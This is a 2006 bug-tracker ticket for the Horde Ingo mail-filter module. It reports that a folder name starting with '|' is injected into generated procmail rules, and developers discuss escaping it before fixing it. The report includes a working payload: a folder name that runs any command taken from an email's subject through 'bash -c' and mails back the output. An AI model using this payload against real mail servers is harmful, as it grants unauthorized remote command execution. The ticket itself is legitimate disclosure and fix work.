5.2.0-git
2014-07-30

[#4513] command execution with procmail
Summary command execution with procmail
Queue Ingo
Queue Version 1.1.1
Type Bug
State Resolved
Priority 3. High
Owners
Requester michael.menge (at) zdv (dot) uni-tuebingen (dot) de
Created 2006-10-11 (2849 days ago)
Due
Updated 2006-10-14 (2846 days ago)
Assigned 2006-10-14 (2846 days ago)
Resolved 2006-10-14 (2846 days ago)
Milestone
Patch No

History
2006-10-14 21:56:52 Chuck Hagenbuch Comment #6
State ⇒ Resolved
Reply to this comment
K, just wanted to double check.
2006-10-14 18:48:53 ben Comment #5 Reply to this comment
I looked at both, and escapeshellcmd() seems to be more appropriate.
2006-10-14 18:41:17 Chuck Hagenbuch Comment #4
State ⇒ Assigned
Reply to this comment
Careful with that; escapeshellcmd is for an entire command. 
escapeshellarg is for a single argument and may be more appropriate 
here (also may not, but you should double-check if you didn't already 
look at it).
2006-10-14 07:32:50 ben Comment #3
State ⇒ Resolved
Reply to this comment
escapeshellcmd() should take care of escaping all necessary characters 
(since that's what it's designed to do).



Fixed in HEAD and FRAMEWORK_3.
2006-10-13 17:37:34 Benoit (dot) Branciard (at) univ-paris1 (dot) fr Comment #2 Reply to this comment
A possible way to handle this, from my own procmail knowledge and 
experiments, would be to escape the folder filenames the following way :



- if the first character is ":", "*", "!", "|", "{" or "}" : prepend 
"./" to the filename

- quote the whole filename with 'single quotes'



but I wonder if procmail may exist on systems where the folder 
separator isn't "/"...


2006-10-11 11:56:01 Jan Schneider Assigned to ben
State ⇒ Assigned
 
2006-10-11 11:34:08 michael (dot) menge (at) zdv (dot) uni-tuebingen (dot) de Comment #1
State ⇒ Unconfirmed
Priority ⇒ 3. High
Type ⇒ Bug
Summary ⇒ command execution with procmail
Queue ⇒ Ingo
Reply to this comment
It is possible to use a foldername beginning

with | as mailbox destination in a filterrule.



If the users don't have shell acces to the mailserver this rule could be

used to bypass this restriction.



EXCAPMLE:



The Foldername

|formail    -rA     "X-Loop:hisemailaddres@excample.com"   |       (   
     cat     -       ;myCmd="$MATCH";  echo    "Executing:     $myCmd" 
;       bash    -c      "$myCmd"

  )       |$SENDMAIL        -oi     -t



would result in a prcmail like the following



* ^From:.*hisemailaddres@excample\.com

{

   :0

   * ^Subject:.*exec_command\/.*$

   |formail    -rA     "X-Loop:hisemailaddres@excample.com"   |       
(       cat     -

    ;

         myCmd="$MATCH"; echo    "Executing:     $myCmd" ;       bash   
   -c      "$myCmd"

       )

         |       $SENDMAIL       -oi     -t

}